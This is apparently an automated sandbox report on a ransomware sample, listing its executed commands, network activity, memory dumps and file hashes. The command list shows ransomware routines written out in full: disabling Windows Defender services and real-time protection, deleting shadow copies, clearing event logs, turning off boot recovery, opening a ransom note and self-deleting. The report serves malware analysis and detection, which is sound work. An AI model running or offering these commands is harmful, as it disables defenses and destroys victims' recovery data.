reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SYSTEM32\notepad.exe
notepad.exe C:\T3yp_HOW_TO_DECRYPT.txt
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe"
C:\Windows\system32\PING.EXE
ping.exe -n 5 127.0.0.1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | time.windows.com | udp |
| US | 168.61.215.74:123 | time.windows.com | udp |
Files
memory/3628-114-0x0000000000000000-mapping.dmp
memory/3996-115-0x0000000000000000-mapping.dmp
memory/4048-116-0x0000000000000000-mapping.dmp
memory/4072-117-0x0000000000000000-mapping.dmp
memory/4028-118-0x0000000000000000-mapping.dmp
memory/4212-119-0x0000000000000000-mapping.dmp
memory/4180-120-0x0000000000000000-mapping.dmp
memory/1624-121-0x0000000000000000-mapping.dmp
memory/4372-122-0x0000000000000000-mapping.dmp
memory/4436-123-0x0000000000000000-mapping.dmp
memory/4344-124-0x0000000000000000-mapping.dmp
memory/732-125-0x0000000000000000-mapping.dmp
memory/788-126-0x0000000000000000-mapping.dmp
memory/4512-127-0x0000000000000000-mapping.dmp
memory/3748-128-0x0000000000000000-mapping.dmp
memory/4068-129-0x0000000000000000-mapping.dmp
memory/4248-130-0x0000000000000000-mapping.dmp
memory/3188-131-0x0000000000000000-mapping.dmp
memory/516-132-0x0000000000000000-mapping.dmp
memory/816-133-0x0000000000000000-mapping.dmp
memory/480-134-0x0000000000000000-mapping.dmp
memory/1216-135-0x0000000000000000-mapping.dmp
memory/1324-136-0x0000000000000000-mapping.dmp
memory/1612-137-0x0000000000000000-mapping.dmp
memory/1804-138-0x0000000000000000-mapping.dmp
memory/2032-139-0x0000000000000000-mapping.dmp
memory/2252-140-0x0000000000000000-mapping.dmp
memory/2556-141-0x0000000000000000-mapping.dmp
memory/2676-142-0x0000000000000000-mapping.dmp
memory/2244-143-0x0000000000000000-mapping.dmp
memory/3880-144-0x0000000000000000-mapping.dmp
memory/4828-145-0x0000000000000000-mapping.dmp
memory/1348-146-0x0000000000000000-mapping.dmp
memory/4968-147-0x0000000000000000-mapping.dmp
memory/1108-148-0x0000000000000000-mapping.dmp
memory/3540-149-0x0000000000000000-mapping.dmp
memory/4936-150-0x0000000000000000-mapping.dmp
memory/4624-151-0x0000000000000000-mapping.dmp
memory/1536-152-0x0000000000000000-mapping.dmp
memory/4400-153-0x0000000000000000-mapping.dmp
memory/5092-154-0x0000000000000000-mapping.dmp
memory/2192-155-0x0000000000000000-mapping.dmp
memory/1104-156-0x0000000000000000-mapping.dmp
memory/1188-157-0x0000000000000000-mapping.dmp
memory/1252-158-0x0000000000000000-mapping.dmp
memory/4788-159-0x0000000000000000-mapping.dmp
memory/708-160-0x0000000000000000-mapping.dmp
memory/2460-161-0x0000000000000000-mapping.dmp
memory/4544-162-0x0000000000000000-mapping.dmp
memory/1556-163-0x0000000000000000-mapping.dmp
memory/1856-164-0x0000000000000000-mapping.dmp
memory/1576-165-0x0000000000000000-mapping.dmp
memory/2188-166-0x0000000000000000-mapping.dmp
memory/3068-167-0x0000000000000000-mapping.dmp
memory/4056-168-0x0000000000000000-mapping.dmp
memory/3300-169-0x0000000000000000-mapping.dmp
memory/1976-170-0x0000000000000000-mapping.dmp
memory/2340-171-0x0000000000000000-mapping.dmp
memory/2256-172-0x0000000000000000-mapping.dmp
memory/3660-173-0x0000000000000000-mapping.dmp
memory/3228-174-0x0000000000000000-mapping.dmp
memory/2164-175-0x0000000000000000-mapping.dmp
memory/5036-176-0x0000000000000000-mapping.dmp
memory/3716-177-0x0000000000000000-mapping.dmp
memory/4516-179-0x0000021DA43C0000-0x0000021DA43C2000-memory.dmp
memory/4516-178-0x0000021DA43C0000-0x0000021DA43C2000-memory.dmp
memory/4516-180-0x0000021DA43C0000-0x0000021DA43C2000-memory.dmp
memory/4516-181-0x0000021DA43C0000-0x0000021DA43C2000-memory.dmp
memory/4516-182-0x0000021DBE2E0000-0x0000021DBE302000-memory.dmp
memory/4516-183-0x0000021DA43C0000-0x0000021DA43C2000-memory.dmp
memory/4516-184-0x0000021DA43C0000-0x0000021DA43C2000-memory.dmp
memory/4516-185-0x0000021DA43C0000-0x0000021DA43C2000-memory.dmp
memory/4516-186-0x0000021DBE5C0000-0x0000021DBE636000-memory.dmp
memory/4516-187-0x0000021DA43C0000-0x0000021DA43C2000-memory.dmp
memory/4516-189-0x0000021DBE1A0000-0x0000021DBE1A2000-memory.dmp
memory/4516-191-0x0000021DBE1A3000-0x0000021DBE1A5000-memory.dmp
memory/4516-213-0x0000021DA43C0000-0x0000021DA43C2000-memory.dmp
memory/4516-214-0x0000021DBE1A6000-0x0000021DBE1A8000-memory.dmp
memory/1844-216-0x0000029E9E350000-0x0000029E9E352000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8592ba100a78835a6b94d5949e13dfc1 |
| SHA1 | 63e901200ab9a57c7dd4c078d7f75dcd3b357020 |
| SHA256 | fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c |
| SHA512 | 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3 |
memory/4516-217-0x0000021DBE1A8000-0x0000021DBE1A9000-memory.dmp
memory/1844-218-0x0000029E9E350000-0x0000029E9E352000-memory.dmp
memory/1844-219-0x0000029E9E350000-0x0000029E9E352000-memory.dmp
memory/1844-220-0x0000029E9E350000-0x0000029E9E352000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 59f57993716ddfee76351bfe6e939813 |
| SHA1 | 5ed61306e3d2000204b833132c7e3cfba4dc65f8 |
| SHA256 | e7fe5c98669aab08ba2b8a79997007cb6dd084e2b87ca856c2ed779eda5aa4b9 |
| SHA512 | a8c56938ed6589a41032652f98c78239d67223d0099671c927f1faf3df6a38a98832c64084fa1e3f75ea896045e5118a3aed8e0a1733b8cfa777c0f43ed6e95d |
memory/1844-221-0x0000029E9FE10000-0x0000029E9FE32000-memory.dmp
memory/1844-223-0x0000029E9E350000-0x0000029E9E352000-memory.dmp
memory/1844-224-0x0000029E9E350000-0x0000029E9E352000-memory.dmp
memory/1844-225-0x0000029E9E350000-0x0000029E9E352000-memory.dmp
memory/1844-226-0x0000029EB85E0000-0x0000029EB8656000-memory.dmp
memory/1844-227-0x0000029E9E350000-0x0000029E9E352000-memory.dmp
memory/1844-231-0x0000029E9E350000-0x0000029E9E352000-memory.dmp
memory/1844-232-0x0000029E9E350000-0x0000029E9E352000-memory.dmp
memory/1844-252-0x0000029E9FDD0000-0x0000029E9FDD2000-memory.dmp
memory/1844-253-0x0000029E9FDD3000-0x0000029E9FDD5000-memory.dmp
memory/1844-254-0x0000029E9FDD6000-0x0000029E9FDD8000-memory.dmp
memory/1844-256-0x0000029E9FDD8000-0x0000029E9FDD9000-memory.dmp
C:\T3yp_HOW_TO_DECRYPT.txt
| MD5 | cf507784737b116dd47b4dc193a97a89 |
| SHA1 | 478c1046fc06ac8d9318ef1b489188e276f7e574 |
| SHA256 | 369186fd878bd200b9822a78153d7f6fb6f52fa2eb2aaef90c4395a9a841f2e6 |
| SHA512 | 7897e831f22d366061baa8318560bee0929d6d48261fb5048358955f7acfa1a5eccca4a21a0918d1f3523d516ffdf449d2bbbf25fe11041219673ef421b92a24 |